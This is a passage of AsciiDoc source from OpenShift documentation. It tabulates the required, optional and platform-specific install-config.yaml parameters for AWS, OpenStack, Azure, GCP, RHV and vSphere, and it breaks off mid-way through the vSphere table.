\"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == 
\"installing-vmc-network-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:vsphere:\nendif::[]\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n[IMPORTANT]\n====\nThe `openshift-install` command does not validate field names for parameters. If an incorrect name is specified, the related file or object is not created, and no error is reported. Ensure that the field names for any parameters that are specified are correct.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. 
This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\nifndef::openshift-origin[]\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). 
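A sketch of the line that enables it in `install-config.yaml`:\n\n[source,yaml]\n----\nfips: true # sketch; the default is false\n----\n\n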
If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n[NOTE]\n====\nIf you are using Azure File storage, you cannot enable FIPS mode.\n====\n|`false` or `true`\nendif::openshift-origin[]\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the network for the cluster.\n|Object\n\n[NOTE]\n====\nYou cannot modify parameters specified by the `networking` object after installation.\n====\n\n|`networking.networkType`\n|The default Container Network Interface (CNI) network provider plug-in to install.\nifdef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OVNKubernetes`.\nendif::openshift-origin[]\nifndef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OpenShiftSDN`.\nendif::openshift-origin[]\n|String\n\n|`networking.clusterNetwork`\n|The IP address blocks for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`. If you specify multiple IP address blocks, the blocks must not overlap.\n|Array of objects. For example:\n\n[source,yaml]\n----\nnetworking:\n clusterNetwork:\n - cidr: 10.128.0.0\/14\n hostPrefix: 23\n----\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. An IP address block.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.128.0.0\/14`.\n\n|`networking.clusterNetwork.hostPrefix`\n|The subnet prefix length to assign to each individual node. For example, if `hostPrefix` is set to `23`, then each node is assigned a `\/23` subnet out of the given `cidr`, allowing for 510 (2^(32 - 23) - 2) pod IP addresses.\n|A subnet prefix. The default value is `23`.\n\n|`networking.serviceNetwork`\n|The IP address block for services. The default is `172.30.0.0\/16`.\n\nThe OpenShift SDN and OVN-Kubernetes Container Network Interface (CNI) network providers support only a single IP address block for the service network.\n|An IP address block in CIDR format. For example, `172.30.0.0\/16`.\n\n[source,yaml]\n----\nnetworking:\n serviceNetwork:\n - 172.30.0.0\/16\n----\n\n|`networking.machineNetwork`\n|The IP address blocks for machines.\n|Array of objects\n\n[source,yaml]\n----\nnetworking:\n machineNetwork:\n - cidr: 10.0.0.0\/16\n----\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. An IP address block. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.0.0.0\/16`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. 
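For example, a sketch of the corresponding `install-config.yaml` line for a private cluster:\n\n[source,yaml]\n----\npublish: Internal # top-level field; private-cluster setting\n----\n\n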
The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access to your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n key1...\n key2...\n key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the compute machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS volume type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the control plane machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. 
If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.hostedZone`\n|An existing Route 53 private hosted zone for the cluster. You can only use a pre-existing hosted zone when also supplying your own VPC. The hosted zone must already be associated with the user-provided VPC before installation. Also, the domain of the hosted zone must be the cluster domain or a parent of the cluster domain. If undefined, the installation program creates a new hosted zone.\n|String, for example `Z3URY6TWQ91KVV`.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. 
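A minimal sketch of a compute pool that requests such a volume, reusing the example values from this table (fragment only; other machine-pool fields are omitted):\n\n[source,yaml]\n----\n# fragment only; example values from this table\ncompute:\n- platform:\n    openstack:\n      rootVolume:\n        size: 30\n        type: performance\n----\n\n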
If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n\nThis property is deprecated. To use a flavor as the default for all machine pools, add it as the value of the `type` key in the `platform.openstack.defaultMachinePlatform` property. You can also set a flavor value for each machine pool individually.\n\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. 
Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.apiFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`controlPlane.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB. 
The minimum supported disk size is `1024`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.resourceGroupName`\n| The name of an already existing resource group to install your cluster to. This resource group must be empty and only used for this specific cluster; the cluster components assume ownership of all resources in the resource group. If you limit the service principal scope of the installation program to this resource group, you must ensure all other resources used by the installation program in your environment have the necessary permissions, such as the public DNS zone and virtual network. Destroying the cluster using the installation program deletes this resource group.\n|String, for example `existing_resource_group`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. 
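A hedged sketch of the matching `install-config.yaml` fragment, assuming an installation that targets the Azure US Government cloud (fragment only; all other required fields are omitted):\n\n[source,yaml]\n----\n# fragment only; value taken from this table\nplatform:\n  azure:\n    cloudName: AzureUSGovernmentCloud\n----\n\n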
If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for control plane machine disk encryption.\n|The encryption key name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For control plane machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For control plane machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For control plane machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nThe GCP Compute Engine System service account used for the encryption request for the given KMS key. The Compute Engine default service account is always used for control plane machines during installation, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. The default service account must have access to the KMS key specified for the control plane machines. The custom service account defined is available for use during post-installation operations. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. 
Re-add when more stable.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for compute machine disk encryption.\n|The encryption key name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For compute machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For compute machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For compute machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`compute.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nFor compute machines, the GCP Compute Engine System service account used for the encryption request for the given KMS key. If left undefined, the Compute Engine default service account is used, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. 
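As an illustrative example, a hypothetical pool that sets 4 cores and 2 sockets gives each VM 8 vCPUs. 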
Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere,vmc[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to 